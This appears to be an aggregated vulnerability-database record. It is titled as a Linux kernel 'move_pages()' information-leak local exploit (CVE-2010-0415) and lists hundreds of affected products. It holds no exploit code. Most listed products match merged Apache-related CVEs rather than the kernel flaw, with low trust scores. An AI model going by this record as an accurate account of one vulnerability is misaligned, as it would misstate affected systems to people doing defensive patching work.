ID
VAR-E-201002-1340
CVE
cve_id: | CVE-2010-0415 | Trust: 1.0 |
cve_id: | CVE-2012-0053 | Trust: 0.8 |
cve_id: | CVE-2011-3368 | Trust: 0.3 |
EDB ID
40810
TITLE
Linux Kernel 2.6.18 - 'move_pages()' Information Leak - Linux local Exploit
Trust: 1.0
DESCRIPTION
Linux Kernel 2.6.18 - 'move_pages()' Information Leak. CVE-2010-0415 . local exploit for Linux platform
Trust: 1.0
AFFECTED PRODUCTS
vendor: | hitachi | model: | web server | scope: | eq | version: | 02-03 | Trust: 1.8 |
vendor: | hitachi | model: | web server 02-04-/a | scope: | - | version: | - | Trust: 1.5 |
vendor: | hitachi | model: | web server | scope: | eq | version: | 02-02 | Trust: 1.2 |
vendor: | hitachi | model: | web server | scope: | eq | version: | 02-01 | Trust: 1.2 |
vendor: | avaya | model: | voice portal | scope: | eq | version: | 5.1 | Trust: 1.2 |
vendor: | linux | model: | kernel | scope: | eq | version: | 2.6.18 | Trust: 1.0 |
vendor: | hp | model: | system management homepage | scope: | eq | version: | 6.2 | Trust: 0.9 |
vendor: | hitachi | model: | web server 01-02-/c | scope: | - | version: | - | Trust: 0.9 |
vendor: | hitachi | model: | web server 01-02-/b | scope: | - | version: | - | Trust: 0.9 |
vendor: | hitachi | model: | web server 01-02-/a | scope: | - | version: | - | Trust: 0.9 |
vendor: | ubuntu | model: | linux lts sparc | scope: | eq | version: | 8.04 | Trust: 0.6 |
vendor: | ubuntu | model: | linux lts powerpc | scope: | eq | version: | 8.04 | Trust: 0.6 |
vendor: | ubuntu | model: | linux lts lpia | scope: | eq | version: | 8.04 | Trust: 0.6 |
vendor: | ubuntu | model: | linux lts i386 | scope: | eq | version: | 8.04 | Trust: 0.6 |
vendor: | ubuntu | model: | linux lts amd64 | scope: | eq | version: | 8.04 | Trust: 0.6 |
vendor: | ubuntu | model: | linux i386 | scope: | eq | version: | 11.10 | Trust: 0.6 |
vendor: | ubuntu | model: | linux amd64 | scope: | eq | version: | 11.10 | Trust: 0.6 |
vendor: | ubuntu | model: | linux powerpc | scope: | eq | version: | 11.04 | Trust: 0.6 |
vendor: | ubuntu | model: | linux i386 | scope: | eq | version: | 11.04 | Trust: 0.6 |
vendor: | ubuntu | model: | linux arm | scope: | eq | version: | 11.04 | Trust: 0.6 |
vendor: | ubuntu | model: | linux amd64 | scope: | eq | version: | 11.04 | Trust: 0.6 |
vendor: | ubuntu | model: | linux powerpc | scope: | eq | version: | 10.10 | Trust: 0.6 |
vendor: | ubuntu | model: | linux i386 | scope: | eq | version: | 10.10 | Trust: 0.6 |
vendor: | ubuntu | model: | linux arm | scope: | eq | version: | 10.10 | Trust: 0.6 |
vendor: | ubuntu | model: | linux amd64 | scope: | eq | version: | 10.10 | Trust: 0.6 |
vendor: | ubuntu | model: | linux sparc | scope: | eq | version: | 10.04 | Trust: 0.6 |
vendor: | ubuntu | model: | linux powerpc | scope: | eq | version: | 10.04 | Trust: 0.6 |
vendor: | ubuntu | model: | linux i386 | scope: | eq | version: | 10.04 | Trust: 0.6 |
vendor: | ubuntu | model: | linux arm | scope: | eq | version: | 10.04 | Trust: 0.6 |
vendor: | ubuntu | model: | linux amd64 | scope: | eq | version: | 10.04 | Trust: 0.6 |
vendor: | slackware | model: | linux x86 64 -current | scope: | - | version: | - | Trust: 0.6 |
vendor: | slackware | model: | linux x86 64 | scope: | eq | version: | 13.37 | Trust: 0.6 |
vendor: | slackware | model: | linux | scope: | eq | version: | 13.37 | Trust: 0.6 |
vendor: | slackware | model: | linux x86 64 | scope: | eq | version: | 13.1 | Trust: 0.6 |
vendor: | slackware | model: | linux | scope: | eq | version: | 13.1 | Trust: 0.6 |
vendor: | slackware | model: | linux x86 64 | scope: | eq | version: | 13.0 | Trust: 0.6 |
vendor: | slackware | model: | linux | scope: | eq | version: | 13.0 | Trust: 0.6 |
vendor: | slackware | model: | linux | scope: | eq | version: | 12.2 | Trust: 0.6 |
vendor: | slackware | model: | linux | scope: | eq | version: | 12.1 | Trust: 0.6 |
vendor: | slackware | model: | linux | scope: | eq | version: | 12.0 | Trust: 0.6 |
vendor: | slackware | model: | linux -current | scope: | - | version: | - | Trust: 0.6 |
vendor: | redhat | model: | enterprise linux desktop workstation client | scope: | eq | version: | 5 | Trust: 0.6 |
vendor: | oracle | model: | enterprise linux | scope: | eq | version: | 6 | Trust: 0.6 |
vendor: | oracle | model: | enterprise linux | scope: | eq | version: | 5 | Trust: 0.6 |
vendor: | mandriva | model: | linux mandrake x86 64 | scope: | eq | version: | 2011 | Trust: 0.6 |
vendor: | mandriva | model: | linux mandrake | scope: | eq | version: | 2011 | Trust: 0.6 |
vendor: | mandriva | model: | linux mandrake x86 64 | scope: | eq | version: | 2010.1 | Trust: 0.6 |
vendor: | mandriva | model: | linux mandrake | scope: | eq | version: | 2010.1 | Trust: 0.6 |
vendor: | mandrakesoft | model: | enterprise server x86 64 | scope: | eq | version: | 5 | Trust: 0.6 |
vendor: | mandrakesoft | model: | enterprise server | scope: | eq | version: | 5 | Trust: 0.6 |
vendor: | hp | model: | system management homepage | scope: | eq | version: | 6.3 | Trust: 0.6 |
vendor: | hp | model: | system management homepage | scope: | eq | version: | 6.1 | Trust: 0.6 |
vendor: | hp | model: | system management homepage | scope: | eq | version: | 6.0 | Trust: 0.6 |
vendor: | hitachi | model: | web server linux | scope: | eq | version: | 04-00 | Trust: 0.6 |
vendor: | hitachi | model: | web server linux | scope: | eq | version: | 03-00 | Trust: 0.6 |
vendor: | hitachi | model: | web server hp-ux | scope: | eq | version: | 03-00 | Trust: 0.6 |
vendor: | hitachi | model: | web server 02-04-/b | scope: | - | version: | - | Trust: 0.6 |
vendor: | hitachi | model: | web server | scope: | eq | version: | 02-04 | Trust: 0.6 |
vendor: | hitachi | model: | web server | scope: | eq | version: | 01-02 | Trust: 0.6 |
vendor: | gentoo | model: | linux | scope: | - | version: | - | Trust: 0.6 |
vendor: | fujitsu | model: | interstage studio standard-j edition | scope: | eq | version: | 9.2 | Trust: 0.6 |
vendor: | fujitsu | model: | interstage studio standard-j edition | scope: | eq | version: | 9.1 | Trust: 0.6 |
vendor: | fujitsu | model: | interstage studio standard-j edition | scope: | eq | version: | 9.0 | Trust: 0.6 |
vendor: | fujitsu | model: | interstage studio standard-j edition | scope: | eq | version: | 8.0.1 | Trust: 0.6 |
vendor: | fujitsu | model: | interstage studio standard-j edition b | scope: | eq | version: | 9.1.0 | Trust: 0.6 |
vendor: | fujitsu | model: | interstage studio enterprise edition | scope: | eq | version: | 9.2 | Trust: 0.6 |
vendor: | fujitsu | model: | interstage studio enterprise edition | scope: | eq | version: | 9.1 | Trust: 0.6 |
vendor: | fujitsu | model: | interstage studio enterprise edition | scope: | eq | version: | 9.0 | Trust: 0.6 |
vendor: | fujitsu | model: | interstage studio enterprise edition | scope: | eq | version: | 8.0.1 | Trust: 0.6 |
vendor: | fujitsu | model: | interstage studio enterprise edition b | scope: | eq | version: | 9.1.0 | Trust: 0.6 |
vendor: | fujitsu | model: | interstage job workload server | scope: | eq | version: | 8.1 | Trust: 0.6 |
vendor: | fujitsu | model: | interstage business application server enterprise | scope: | eq | version: | 8.0.0 | Trust: 0.6 |
vendor: | fujitsu | model: | interstage apworks modelers-j edition | scope: | eq | version: | 7.0 | Trust: 0.6 |
vendor: | fujitsu | model: | interstage apworks modelers-j edition 6.0a | scope: | - | version: | - | Trust: 0.6 |
vendor: | fujitsu | model: | interstage apworks modelers-j edition | scope: | eq | version: | 6.0 | Trust: 0.6 |
vendor: | fujitsu | model: | interstage application server enterprise edition | scope: | eq | version: | 9.2 | Trust: 0.6 |
vendor: | fujitsu | model: | interstage application server enterprise edition a | scope: | eq | version: | 9.0 | Trust: 0.6 |
vendor: | fujitsu | model: | interstage application server enterprise edition | scope: | eq | version: | 9.0 | Trust: 0.6 |
vendor: | fujitsu | model: | interstage application server enterprise edition | scope: | eq | version: | 8.0.2 | Trust: 0.6 |
vendor: | fujitsu | model: | interstage application server enterprise edition | scope: | eq | version: | 8.0.1 | Trust: 0.6 |
vendor: | fujitsu | model: | interstage application server enterprise edition | scope: | eq | version: | 7.0.1 | Trust: 0.6 |
vendor: | fujitsu | model: | interstage application server enterprise edition | scope: | eq | version: | 7.0 | Trust: 0.6 |
vendor: | fujitsu | model: | interstage application server enterprise edition | scope: | eq | version: | 6.0 | Trust: 0.6 |
vendor: | fujitsu | model: | interstage application server enterprise edition | scope: | eq | version: | 5.0 | Trust: 0.6 |
vendor: | debian | model: | linux sparc | scope: | eq | version: | 6.0 | Trust: 0.6 |
vendor: | debian | model: | linux s/390 | scope: | eq | version: | 6.0 | Trust: 0.6 |
vendor: | debian | model: | linux powerpc | scope: | eq | version: | 6.0 | Trust: 0.6 |
vendor: | debian | model: | linux mips | scope: | eq | version: | 6.0 | Trust: 0.6 |
vendor: | debian | model: | linux ia-64 | scope: | eq | version: | 6.0 | Trust: 0.6 |
vendor: | debian | model: | linux ia-32 | scope: | eq | version: | 6.0 | Trust: 0.6 |
vendor: | debian | model: | linux arm | scope: | eq | version: | 6.0 | Trust: 0.6 |
vendor: | debian | model: | linux amd64 | scope: | eq | version: | 6.0 | Trust: 0.6 |
vendor: | avaya | model: | voice portal | scope: | eq | version: | 5.1.2 | Trust: 0.6 |
vendor: | avaya | model: | voice portal | scope: | eq | version: | 5.1.1 | Trust: 0.6 |
vendor: | avaya | model: | voice portal sp1 | scope: | eq | version: | 5.1 | Trust: 0.6 |
vendor: | avaya | model: | voice portal sp2 | scope: | eq | version: | 5.0 | Trust: 0.6 |
vendor: | avaya | model: | voice portal sp1 | scope: | eq | version: | 5.0 | Trust: 0.6 |
vendor: | avaya | model: | voice portal | scope: | eq | version: | 5.0 | Trust: 0.6 |
vendor: | avaya | model: | ip office application server | scope: | eq | version: | 8.0 | Trust: 0.6 |
vendor: | avaya | model: | ip office application server | scope: | eq | version: | 7.0 | Trust: 0.6 |
vendor: | avaya | model: | ip office application server | scope: | eq | version: | 6.1 | Trust: 0.6 |
vendor: | avaya | model: | ip office application server | scope: | eq | version: | 6.0 | Trust: 0.6 |
vendor: | avaya | model: | aura session manager | scope: | eq | version: | 6.1.3 | Trust: 0.6 |
vendor: | avaya | model: | aura session manager | scope: | eq | version: | 6.1.2 | Trust: 0.6 |
vendor: | avaya | model: | aura session manager | scope: | eq | version: | 6.1.1 | Trust: 0.6 |
vendor: | avaya | model: | aura session manager sp2 | scope: | eq | version: | 6.1 | Trust: 0.6 |
vendor: | avaya | model: | aura session manager sp1 | scope: | eq | version: | 6.1 | Trust: 0.6 |
vendor: | avaya | model: | aura session manager | scope: | eq | version: | 6.1 | Trust: 0.6 |
vendor: | avaya | model: | aura session manager sp1 | scope: | eq | version: | 6.0 | Trust: 0.6 |
vendor: | avaya | model: | aura session manager | scope: | eq | version: | 6.0 | Trust: 0.6 |
vendor: | avaya | model: | aura session manager sp2 | scope: | eq | version: | 5.2 | Trust: 0.6 |
vendor: | avaya | model: | aura session manager sp1 | scope: | eq | version: | 5.2 | Trust: 0.6 |
vendor: | avaya | model: | aura session manager | scope: | eq | version: | 5.2 | Trust: 0.6 |
vendor: | avaya | model: | aura session manager | scope: | eq | version: | 1.1 | Trust: 0.6 |
vendor: | avaya | model: | aura session manager | scope: | eq | version: | 1.0 | Trust: 0.6 |
vendor: | avaya | model: | aura messaging | scope: | eq | version: | 6.0.1 | Trust: 0.6 |
vendor: | avaya | model: | aura messaging | scope: | eq | version: | 6.0 | Trust: 0.6 |
vendor: | avaya | model: | aura experience portal | scope: | eq | version: | 6.0 | Trust: 0.6 |
vendor: | avaya | model: | aura communication manager utility services | scope: | eq | version: | 6.2 | Trust: 0.6 |
vendor: | avaya | model: | aura communication manager utility services | scope: | eq | version: | 6.1 | Trust: 0.6 |
vendor: | avaya | model: | aura communication manager utility services | scope: | eq | version: | 6.0 | Trust: 0.6 |
vendor: | avaya | model: | aura communication manager | scope: | eq | version: | 6.0.1 | Trust: 0.6 |
vendor: | avaya | model: | aura communication manager | scope: | eq | version: | 6.0 | Trust: 0.6 |
vendor: | avaya | model: | aura application enablement services | scope: | eq | version: | 5.2.1 | Trust: 0.6 |
vendor: | avaya | model: | aura application enablement services | scope: | eq | version: | 6.1.1 | Trust: 0.6 |
vendor: | avaya | model: | aura application enablement services | scope: | eq | version: | 6.1 | Trust: 0.6 |
vendor: | avaya | model: | aura application enablement services | scope: | eq | version: | 5.2.3 | Trust: 0.6 |
vendor: | avaya | model: | aura application enablement services | scope: | eq | version: | 5.2.2 | Trust: 0.6 |
vendor: | avaya | model: | aura application enablement services | scope: | eq | version: | 5.2 | Trust: 0.6 |
vendor: | apple | model: | mac os server | scope: | eq | version: | x10.7.3 | Trust: 0.6 |
vendor: | apple | model: | mac os server | scope: | eq | version: | x10.7.2 | Trust: 0.6 |
vendor: | apple | model: | mac os server | scope: | eq | version: | x10.7.1 | Trust: 0.6 |
vendor: | apple | model: | mac os server | scope: | eq | version: | x10.7 | Trust: 0.6 |
vendor: | apple | model: | mac os server | scope: | eq | version: | x10.6.8 | Trust: 0.6 |
vendor: | apple | model: | mac os | scope: | eq | version: | x10.7.4 | Trust: 0.6 |
vendor: | apple | model: | mac os | scope: | eq | version: | x10.7.3 | Trust: 0.6 |
vendor: | apple | model: | mac os | scope: | eq | version: | x10.7.2 | Trust: 0.6 |
vendor: | apple | model: | mac os | scope: | eq | version: | x10.7.1 | Trust: 0.6 |
vendor: | avaya | model: | aura communication manager | scope: | eq | version: | 4.0 | Trust: 0.6 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.2 | Trust: 0.6 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3 | Trust: 0.6 |
vendor: | apache | model: | protocol.c cookie | scope: | - | version: | - | Trust: 0.5 |
vendor: | xerox | model: | freeflow print server 73.c0.41 | scope: | - | version: | - | Trust: 0.3 |
vendor: | xerox | model: | freeflow print server 73.b3.61 | scope: | - | version: | - | Trust: 0.3 |
vendor: | suse | model: | linux enterprise server for vmware sp1 | scope: | eq | version: | 11 | Trust: 0.3 |
vendor: | suse | model: | linux enterprise server sp1 | scope: | eq | version: | 11 | Trust: 0.3 |
vendor: | suse | model: | linux enterprise server sp4 | scope: | eq | version: | 10 | Trust: 0.3 |
vendor: | suse | model: | linux enterprise sdk sp1 | scope: | eq | version: | 11 | Trust: 0.3 |
vendor: | suse | model: | linux enterprise sdk sp4 | scope: | eq | version: | 10 | Trust: 0.3 |
vendor: | sophos | model: | web appliance | scope: | eq | version: | 3.8.1 | Trust: 0.3 |
vendor: | sophos | model: | web appliance | scope: | eq | version: | 3.8.0 | Trust: 0.3 |
vendor: | sophos | model: | web appliance | scope: | eq | version: | 3.7.9 | Trust: 0.3 |
vendor: | redhat | model: | jboss enterprise web server for rhel | scope: | eq | version: | 61.0 | Trust: 0.3 |
vendor: | redhat | model: | jboss enterprise web server for rhel server | scope: | eq | version: | 51.0 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux workstation | scope: | eq | version: | 6 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux server | scope: | eq | version: | 6 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux hpc node optional | scope: | eq | version: | 6 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux hpc node | scope: | eq | version: | 6 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux desktop optional | scope: | eq | version: | 6 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux desktop | scope: | eq | version: | 6 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux desktop client | scope: | eq | version: | 5 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux server | scope: | eq | version: | 5 | Trust: 0.3 |
vendor: | oracle | model: | enterprise linux | scope: | eq | version: | 6.2 | Trust: 0.3 |
vendor: | juniper | model: | nsmexpress | scope: | eq | version: | - | Trust: 0.3 |
vendor: | juniper | model: | nsm3000 | scope: | eq | version: | - | Trust: 0.3 |
vendor: | juniper | model: | network and security manager software | scope: | eq | version: | 2012.2- | Trust: 0.3 |
vendor: | juniper | model: | junos space | scope: | eq | version: | 12.3 | Trust: 0.3 |
vendor: | juniper | model: | junos space | scope: | eq | version: | 12.2 | Trust: 0.3 |
vendor: | juniper | model: | junos space | scope: | eq | version: | 12.1 | Trust: 0.3 |
vendor: | juniper | model: | junos space | scope: | eq | version: | 11.3 | Trust: 0.3 |
vendor: | juniper | model: | junos space | scope: | eq | version: | 11.2 | Trust: 0.3 |
vendor: | juniper | model: | junos space | scope: | eq | version: | 11.1 | Trust: 0.3 |
vendor: | ibm | model: | storwize unified | scope: | eq | version: | v70001.3.20 | Trust: 0.3 |
vendor: | ibm | model: | storwize unified | scope: | eq | version: | v70001.3.1.0 | Trust: 0.3 |
vendor: | ibm | model: | storwize unified | scope: | eq | version: | v70001.3.0.5 | Trust: 0.3 |
vendor: | ibm | model: | storwize unified | scope: | eq | version: | v70001.3.0.0 | Trust: 0.3 |
vendor: | hp | model: | xp provisioning manager | scope: | eq | version: | 5.0.0-00 | Trust: 0.3 |
vendor: | hp | model: | xp p9000 command view advanced edition | scope: | eq | version: | 7.4.0-00 | Trust: 0.3 |
vendor: | hp | model: | xp p9000 command view advanced edition | scope: | eq | version: | 7.3.1-00 | Trust: 0.3 |
vendor: | hp | model: | system management homepage | scope: | eq | version: | 7.1 | Trust: 0.3 |
vendor: | hp | model: | system management homepage | scope: | eq | version: | 7.0 | Trust: 0.3 |
vendor: | hp | model: | p9000 tiered storage manager | scope: | eq | version: | 5.0.0-00 | Trust: 0.3 |
vendor: | hp | model: | p9000 replication monitor | scope: | eq | version: | 6.0.0-00 | Trust: 0.3 |
vendor: | hp | model: | p9000 replication monitor | scope: | eq | version: | 5.0.0-00 | Trust: 0.3 |
vendor: | hp | model: | p9000 replication manager | scope: | eq | version: | 6.0.0-00 | Trust: 0.3 |
vendor: | hp | model: | onboard administrator | scope: | eq | version: | 3.55 | Trust: 0.3 |
vendor: | hp | model: | onboard administrator | scope: | eq | version: | 3.50 | Trust: 0.3 |
vendor: | hp | model: | hp-ux b.11.31 | scope: | - | version: | - | Trust: 0.3 |
vendor: | hp | model: | hp-ux b.11.11 | scope: | - | version: | - | Trust: 0.3 |
vendor: | hitachi | model: | web server windows | scope: | eq | version: | 04-10-03(x64) | Trust: 0.3 |
vendor: | hitachi | model: | web server windows | scope: | eq | version: | 04-10-01(x64) | Trust: 0.3 |
vendor: | hitachi | model: | web server windows | scope: | eq | version: | 03-00-060 | Trust: 0.3 |
vendor: | hitachi | model: | web server security enhancement 02-04-/b | scope: | eq | version: | - | Trust: 0.3 |
vendor: | hitachi | model: | web server windows | scope: | eq | version: | 04-10-03 | Trust: 0.3 |
vendor: | hitachi | model: | web server hp-ux | scope: | eq | version: | 04-10-02 | Trust: 0.3 |
vendor: | hitachi | model: | web server hp-ux | scope: | eq | version: | 04-10-01 | Trust: 0.3 |
vendor: | hitachi | model: | web server windows | scope: | eq | version: | 04-10 | Trust: 0.3 |
vendor: | hitachi | model: | web server windows | scope: | eq | version: | 04-00-05 | Trust: 0.3 |
vendor: | hitachi | model: | web server hp-ux | scope: | eq | version: | 04-00-04 | Trust: 0.3 |
vendor: | hitachi | model: | web server solaris | scope: | eq | version: | 04-00-01 | Trust: 0.3 |
vendor: | hitachi | model: | web server windows | scope: | eq | version: | 04-00 | Trust: 0.3 |
vendor: | hitachi | model: | web server hp-ux | scope: | eq | version: | 04-00 | Trust: 0.3 |
vendor: | hitachi | model: | web server aix | scope: | eq | version: | 04-00 | Trust: 0.3 |
vendor: | hitachi | model: | web server windows | scope: | eq | version: | 03-10-10 | Trust: 0.3 |
vendor: | hitachi | model: | web server hp-ux | scope: | eq | version: | 03-10-09 | Trust: 0.3 |
vendor: | hitachi | model: | web server windows | scope: | eq | version: | 03-10 | Trust: 0.3 |
vendor: | hitachi | model: | web server hp-ux | scope: | eq | version: | 03-10 | Trust: 0.3 |
vendor: | hitachi | model: | web server hp-ux | scope: | eq | version: | 03-00-05 | Trust: 0.3 |
vendor: | hitachi | model: | web server | scope: | eq | version: | 03-00-02 | Trust: 0.3 |
vendor: | hitachi | model: | web server hp-ux | scope: | eq | version: | 03-00-01 | Trust: 0.3 |
vendor: | hitachi | model: | web server | scope: | eq | version: | 03-00-01 | Trust: 0.3 |
vendor: | hitachi | model: | web server windows | scope: | eq | version: | 03-00 | Trust: 0.3 |
vendor: | hitachi | model: | web server solaris | scope: | eq | version: | 03-00 | Trust: 0.3 |
vendor: | hitachi | model: | web server aix | scope: | eq | version: | 03-00 | Trust: 0.3 |
vendor: | hitachi | model: | web server | scope: | eq | version: | 02-05 | Trust: 0.3 |
vendor: | hitachi | model: | web server 02-04-/c | scope: | - | version: | - | Trust: 0.3 |
vendor: | hitachi | model: | web server 02-04-/a (windows(ip | scope: | - | version: | - | Trust: 0.3 |
vendor: | hitachi | model: | web server ) | scope: | eq | version: | 02-04 | Trust: 0.3 |
vendor: | hitachi | model: | web server ) | scope: | eq | version: | 02-03 | Trust: 0.3 |
vendor: | hitachi | model: | web server 01-02-/d | scope: | - | version: | - | Trust: 0.3 |
vendor: | hitachi | model: | cosminexus developer no version | scope: | eq | version: | 0 | Trust: 0.3 |
vendor: | hitachi | model: | cosminexus application server no version | scope: | eq | version: | 0 | Trust: 0.3 |
vendor: | hitachi | model: | cosminexus | scope: | eq | version: | 9.0 | Trust: 0.3 |
vendor: | hitachi | model: | cosminexus | scope: | eq | version: | 8.0 | Trust: 0.3 |
vendor: | hitachi | model: | cosminexus | scope: | eq | version: | 7.0 | Trust: 0.3 |
vendor: | hitachi | model: | cosminexus | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | hitachi | model: | cosminexus | scope: | eq | version: | 5.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage studio standard-j edition | scope: | eq | version: | 10.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage studio enterprise edition | scope: | eq | version: | 10.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server standard-j edition | scope: | eq | version: | 9.3.1 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server enterprise edition | scope: | eq | version: | 10.0 | Trust: 0.3 |
vendor: | f5 | model: | firepass | scope: | eq | version: | 7.0 | Trust: 0.3 |
vendor: | f5 | model: | firepass | scope: | eq | version: | 6.1 | Trust: 0.3 |
vendor: | f5 | model: | enterprise manager | scope: | eq | version: | 2.3 | Trust: 0.3 |
vendor: | f5 | model: | enterprise manager | scope: | eq | version: | 2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip wom | scope: | eq | version: | 11.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip wom | scope: | eq | version: | 10.2.4 | Trust: 0.3 |
vendor: | f5 | model: | big-ip wom | scope: | eq | version: | 10.2.2 | Trust: 0.3 |
vendor: | f5 | model: | big-ip wom | scope: | eq | version: | 10.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip wom | scope: | eq | version: | 10.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip wom | scope: | eq | version: | 11.1.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip wom hf1 | scope: | eq | version: | 10.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip webaccelerator | scope: | eq | version: | 11.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip webaccelerator | scope: | eq | version: | 11.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip webaccelerator | scope: | eq | version: | 10.2.4 | Trust: 0.3 |
vendor: | f5 | model: | big-ip webaccelerator | scope: | eq | version: | 10.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip webaccelerator | scope: | eq | version: | 10.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip webaccelerator hf1 | scope: | eq | version: | 10.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip psm | scope: | eq | version: | 11.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip psm | scope: | eq | version: | 11.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip psm | scope: | eq | version: | 10.2.4 | Trust: 0.3 |
vendor: | f5 | model: | big-ip psm | scope: | eq | version: | 10.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip psm | scope: | eq | version: | 10.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip psm hf1 | scope: | eq | version: | 10.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip ltm | scope: | eq | version: | 11.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip ltm | scope: | eq | version: | 10.2.4 | Trust: 0.3 |
vendor: | f5 | model: | big-ip ltm | scope: | eq | version: | 10.2.2 | Trust: 0.3 |
vendor: | f5 | model: | big-ip ltm | scope: | eq | version: | 10.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip ltm | scope: | eq | version: | 11.1.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip ltm hf1 | scope: | eq | version: | 10.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip ltm | scope: | eq | version: | 10.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip link controller | scope: | eq | version: | 11.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip link controller | scope: | eq | version: | 11.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip link controller | scope: | eq | version: | 10.2.4 | Trust: 0.3 |
vendor: | f5 | model: | big-ip link controller | scope: | eq | version: | 10.2.2 | Trust: 0.3 |
vendor: | f5 | model: | big-ip link controller | scope: | eq | version: | 10.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip link controller | scope: | eq | version: | 10.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip link controller hf1 | scope: | eq | version: | 10.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip gtm | scope: | eq | version: | 11.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip gtm | scope: | eq | version: | 10.2.4 | Trust: 0.3 |
vendor: | f5 | model: | big-ip gtm | scope: | eq | version: | 10.2.2 | Trust: 0.3 |
vendor: | f5 | model: | big-ip gtm | scope: | eq | version: | 10.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip gtm | scope: | eq | version: | 10.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip gtm | scope: | eq | version: | 11.1.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip gtm hf1 | scope: | eq | version: | 10.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip edge gateway | scope: | eq | version: | 11.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip edge gateway | scope: | eq | version: | 11.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip edge gateway | scope: | eq | version: | 10.2.4 | Trust: 0.3 |
vendor: | f5 | model: | big-ip edge gateway | scope: | eq | version: | 10.2.2 | Trust: 0.3 |
vendor: | f5 | model: | big-ip edge gateway | scope: | eq | version: | 10.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip edge gateway hf1 | scope: | eq | version: | 10.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip edge gateway | scope: | eq | version: | 10.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip asm | scope: | eq | version: | 11.0.00 | Trust: 0.3 |
vendor: | f5 | model: | big-ip asm | scope: | eq | version: | 10.2.40 | Trust: 0.3 |
vendor: | f5 | model: | big-ip asm | scope: | eq | version: | 10.0.00 | Trust: 0.3 |
vendor: | f5 | model: | big-ip asm | scope: | eq | version: | 10.2.2 | Trust: 0.3 |
vendor: | f5 | model: | big-ip asm | scope: | eq | version: | 10.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip asm | scope: | eq | version: | 11.1.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip asm hf1 | scope: | eq | version: | 10.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip apm | scope: | eq | version: | 11.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip apm | scope: | eq | version: | 10.2.4 | Trust: 0.3 |
vendor: | f5 | model: | big-ip apm | scope: | eq | version: | 10.2.2 | Trust: 0.3 |
vendor: | f5 | model: | big-ip apm | scope: | eq | version: | 11.1.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip apm hf1 | scope: | eq | version: | 10.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip apm | scope: | eq | version: | 10.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip apm | scope: | eq | version: | 10.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip analytics | scope: | eq | version: | 11.1.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip analytics 11.0.0-hf2 | scope: | - | version: | - | Trust: 0.3 |
vendor: | f5 | model: | big-ip analytics | scope: | eq | version: | 11.0.0 | Trust: 0.3 |
vendor: | f5 | model: | arx | scope: | eq | version: | 6.4 | Trust: 0.3 |
vendor: | f5 | model: | arx | scope: | eq | version: | 6.3 | Trust: 0.3 |
vendor: | f5 | model: | arx | scope: | eq | version: | 6.2 | Trust: 0.3 |
vendor: | f5 | model: | arx | scope: | eq | version: | 6.1.1 | Trust: 0.3 |
vendor: | f5 | model: | arx | scope: | eq | version: | 6.1 | Trust: 0.3 |
vendor: | f5 | model: | arx | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | avaya | model: | aura messaging | scope: | eq | version: | 6.1 | Trust: 0.3 |
vendor: | apple | model: | mac os server | scope: | eq | version: | x10.7.5 | Trust: 0.3 |
vendor: | apple | model: | mac os | scope: | eq | version: | x10.7 | Trust: 0.3 |
vendor: | apple | model: | mac os | scope: | eq | version: | x10.6.8 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.2.15 | Trust: 0.3 |
